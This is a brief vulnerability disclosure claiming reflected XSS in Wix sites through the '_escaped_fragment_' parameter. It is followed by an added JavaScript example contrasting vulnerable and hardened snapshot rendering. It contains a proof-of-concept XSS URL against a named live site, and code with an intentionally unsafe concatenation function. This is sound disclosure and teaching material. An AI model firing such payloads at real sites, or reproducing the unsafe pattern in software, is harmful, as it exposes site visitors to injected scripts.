57 million web pages are affected by a security problem in wix.com
Proof of concept on a web page made with wix.com:
http://www.itsec.cl/
Viewing the source code, one can observe the following:
...
Find the SEO content of this site's homepage via http://www.itsec.cl/?_escaped_fragment_=
(That is where search engines like Google go to read your homepage's content.)
...
I tried to access an existing section and added a third, invalid parameter; after that I launched the attack code:
Valid URL:
http://www.itsec.cl/?_escaped_fragment_=partners/c1ryi/
XSS URL:
http://www.itsec.cl/?_escaped_fragment_=partners/c1ryi/x"><s cript>alert('xss')</script>
How cheap is expensive.
/Devsec, Security Department. Chile./
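
The reflection described above, as an added example that is not part of the original post and is not Wix's code: it assumes the `_escaped_fragment_` value is echoed into a double-quoted attribute of the HTML snapshot (as the `x">` breakout suggests) and shows the unencoded rendering beside an allow-listed, HTML-encoded one. The function names and the `example.test` host are hypothetical.

```javascript
// Added example: hypothetical snapshot renderer, not Wix's code.
// Assumption: the fragment is written into a double-quoted HTML attribute.

// Constructed sample requests (host is a placeholder).
const BASE = 'http://example.test/?_escaped_fragment_=';
const VALID_URL = BASE + 'partners/c1ryi/';
const ATTACK_URL = BASE +
  encodeURIComponent('partners/c1ryi/x"><script>alert(\'xss\')</script>');

// Read the fragment; URLSearchParams percent-decodes it exactly once.
function getEscapedFragment(requestUrl) {
  return new URL(requestUrl).searchParams.get('_escaped_fragment_') || '';
}

// Encode characters that can end an attribute value or open a tag.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;',
                '"': '&quot;', "'": '&#39;', '`': '&#96;' };
  return String(value).replace(/[&<>"'`]/g, (ch) => map[ch]);
}

// Vulnerable form: the decoded value is concatenated into the markup,
// so a double quote closes the attribute and the rest is parsed as HTML.
function renderSnapshotUnsafe(requestUrl) {
  return '<a href="/#!' + getEscapedFragment(requestUrl) + '">section</a>';
}

// Hardened form: accept only path-like fragments (letters, digits, '_',
// '-', separated by '/'), and HTML-encode whatever is written out.
const SAFE_FRAGMENT = /^[A-Za-z0-9_-]+(\/[A-Za-z0-9_-]+)*\/?$/;

function renderSnapshotSafe(requestUrl) {
  const frag = getEscapedFragment(requestUrl);
  const value = SAFE_FRAGMENT.test(frag) ? frag : ''; // reject, do not repair
  return '<a href="/#!' + escapeHtml(value) + '">section</a>';
}

console.log(renderSnapshotUnsafe(ATTACK_URL)); // attribute is broken out of
console.log(renderSnapshotSafe(ATTACK_URL));   // fragment rejected
console.log(renderSnapshotSafe(VALID_URL));    // valid section kept
```

The allow-list and the output encoding are independent layers: the encoding alone already keeps the quote inside the attribute, and the allow-list rejects the unexpected extra path segment before it is rendered.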